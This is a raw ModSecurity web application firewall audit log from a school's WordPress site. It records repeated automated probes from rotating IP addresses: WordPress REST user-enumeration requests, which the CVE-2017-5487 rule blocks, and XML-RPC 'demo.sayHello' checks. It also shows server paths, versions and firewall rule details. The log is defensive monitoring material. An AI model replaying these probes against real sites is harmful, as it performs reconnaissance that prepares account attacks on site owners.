smkn22-jkt.sch.id X-Real-IP: 156.228.82.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.197 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23ccb706-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23ccb706-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425059928212 2119 (- - -) Stopwatch2: 1747425059928212 2119; combined=1051, p1=331, p2=693, p3=0, p4=0, p5=26, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23ccb706-Z-- --18d9d068-A-- [17/May/2025:02:51:07 +0700] aCeXK9e6THFz1hsaJaLZHgAAAAg 103.236.140.4 54368 103.236.140.4 8181 --18d9d068-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.197 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.197 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --18d9d068-C-- demo.sayHello --18d9d068-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --18d9d068-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425067457401 5772 (- - -) Stopwatch2: 1747425067457401 5772; combined=4279, p1=555, p2=3498, p3=32, p4=37, p5=93, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d9d068-Z-- --61ccdc11-A-- [17/May/2025:02:51:18 +0700] aCeXNte6THFz1hsaJaLZIAAAAAU 103.236.140.4 54372 103.236.140.4 8181 --61ccdc11-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --61ccdc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61ccdc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425078333356 2717 (- - -) Stopwatch2: 1747425078333356 2717; combined=1236, p1=413, p2=793, p3=0, p4=0, p5=29, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61ccdc11-Z-- --6b1fa56c-A-- [17/May/2025:02:51:24 +0700] aCeXPNe6THFz1hsaJaLZJAAAAAk 103.236.140.4 54380 103.236.140.4 8181 --6b1fa56c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.107.38 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.107.38 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6b1fa56c-C-- demo.sayHello --6b1fa56c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b1fa56c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425084304955 4601 (- - -) Stopwatch2: 1747425084304955 4601; combined=3639, p1=455, p2=2985, p3=23, p4=23, p5=90, sr=67, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b1fa56c-Z-- --c095316e-A-- [17/May/2025:02:51:47 +0700] aCeXU9e6THFz1hsaJaLZJQAAAAQ 103.236.140.4 54384 103.236.140.4 8181 --c095316e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c095316e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c095316e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425107946568 2776 (- - -) Stopwatch2: 1747425107946568 2776; combined=1270, p1=431, p2=809, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c095316e-Z-- --dc649f43-A-- [17/May/2025:02:51:50 +0700] aCeXVte6THFz1hsaJaLZJwAAAAc 103.236.140.4 54388 103.236.140.4 8181 --dc649f43-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.240 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc649f43-C-- demo.sayHello --dc649f43-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc649f43-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425110984950 5802 (- - -) Stopwatch2: 1747425110984950 5802; combined=4238, p1=583, p2=3370, p3=29, p4=87, p5=98, sr=107, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc649f43-Z-- --fa7ff965-A-- [17/May/2025:02:52:11 +0700] aCeXa8e47ocjCGWTS4Y_BQAAAEo 103.236.140.4 54392 103.236.140.4 8181 --fa7ff965-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fa7ff965-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa7ff965-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425131932144 3384 (- - -) Stopwatch2: 1747425131932144 3384; combined=1448, p1=484, p2=930, p3=0, p4=0, p5=34, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa7ff965-Z-- --cc2add74-A-- [17/May/2025:02:52:18 +0700] aCeXcte6THFz1hsaJaLZKQAAABQ 103.236.140.4 54396 103.236.140.4 8181 --cc2add74-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --cc2add74-C-- demo.sayHello --cc2add74-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc2add74-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425138497772 4848 (- - -) Stopwatch2: 1747425138497772 4848; combined=3831, p1=477, p2=3034, p3=29, p4=26, p5=146, sr=69, sw=119, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc2add74-Z-- --5d60ba2f-A-- [17/May/2025:02:52:32 +0700] aCeXgMe47ocjCGWTS4Y_BwAAAEY 103.236.140.4 54400 103.236.140.4 8181 --5d60ba2f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.150 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5d60ba2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d60ba2f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425152898725 2805 (- - -) Stopwatch2: 1747425152898725 2805; combined=1259, p1=424, p2=805, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d60ba2f-Z-- --f3b0b318-A-- [17/May/2025:02:52:40 +0700] aCeXiNe6THFz1hsaJaLZKwAAABE 103.236.140.4 54404 103.236.140.4 8181 --f3b0b318-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3b0b318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3b0b318-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425160377354 3320 (- - -) Stopwatch2: 1747425160377354 3320; combined=1384, p1=487, p2=864, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3b0b318-Z-- --7cda8641-A-- [17/May/2025:02:52:40 +0700] aCeXiMe47ocjCGWTS4Y_CQAAAFA 103.236.140.4 54406 103.236.140.4 8181 --7cda8641-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.150 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.150 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cda8641-C-- demo.sayHello --7cda8641-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cda8641-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425160392555 5504 (- - -) Stopwatch2: 1747425160392555 5504; combined=4178, p1=506, p2=3445, p3=34, p4=37, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cda8641-Z-- --ae069f03-A-- [17/May/2025:02:52:42 +0700] aCeXite6THFz1hsaJaLZLAAAAA8 103.236.140.4 54408 103.236.140.4 8181 --ae069f03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.23 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ae069f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ae069f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425162315804 2365 (- - -) Stopwatch2: 1747425162315804 2365; combined=1108, p1=345, p2=735, p3=0, p4=0, p5=27, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ae069f03-Z-- --2a63d92b-A-- [17/May/2025:02:52:46 +0700] aCeXjte6THFz1hsaJaLZLwAAABY 103.236.140.4 54414 103.236.140.4 8181 --2a63d92b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.33.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.33.53 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2a63d92b-C-- demo.sayHello --2a63d92b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a63d92b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425166322162 5602 (- - -) Stopwatch2: 1747425166322162 5602; combined=4154, p1=524, p2=3397, p3=40, p4=32, p5=97, sr=76, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a63d92b-Z-- --1627e47a-A-- [17/May/2025:02:52:47 +0700] aCeXj9e6THFz1hsaJaLZMAAAAAM 103.236.140.4 54418 103.236.140.4 8181 --1627e47a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.86.23 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.86.23 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1627e47a-C-- demo.sayHello --1627e47a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1627e47a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425167991789 4753 (- - -) Stopwatch2: 1747425167991789 4753; combined=3667, p1=459, p2=3006, p3=25, p4=28, p5=87, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1627e47a-Z-- --96ebd94a-A-- [17/May/2025:02:53:58 +0700] aCeX1thEtho3ciA0weheJQAAAIY 103.236.140.4 54432 103.236.140.4 8181 --96ebd94a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --96ebd94a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96ebd94a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425238603791 2790 (- - -) Stopwatch2: 1747425238603791 2790; combined=1281, p1=443, p2=807, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96ebd94a-Z-- --2818dc02-A-- [17/May/2025:02:54:03 +0700] aCeX29hEtho3ciA0weheKAAAAJY 103.236.140.4 54440 103.236.140.4 8181 --2818dc02-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.26 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2818dc02-C-- demo.sayHello --2818dc02-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2818dc02-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747425243784812 5137 (- - -) Stopwatch2: 1747425243784812 5137; combined=3808, p1=484, p2=3125, p3=35, p4=35, p5=76, sr=59, sw=53, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2818dc02-Z-- --d9e2a730-A-- [17/May/2025:02:54:07 +0700] aCeX39hEtho3ciA0weheKwAAAJc 103.236.140.4 54446 103.236.140.4 8181 --d9e2a730-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d9e2a730-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9e2a730-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747425247517484 2157 (- - -) Stopwatch2: 1747425247517484 2157; combined=979, p1=329, p2=627, p3=0, p4=0, p5=23, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" 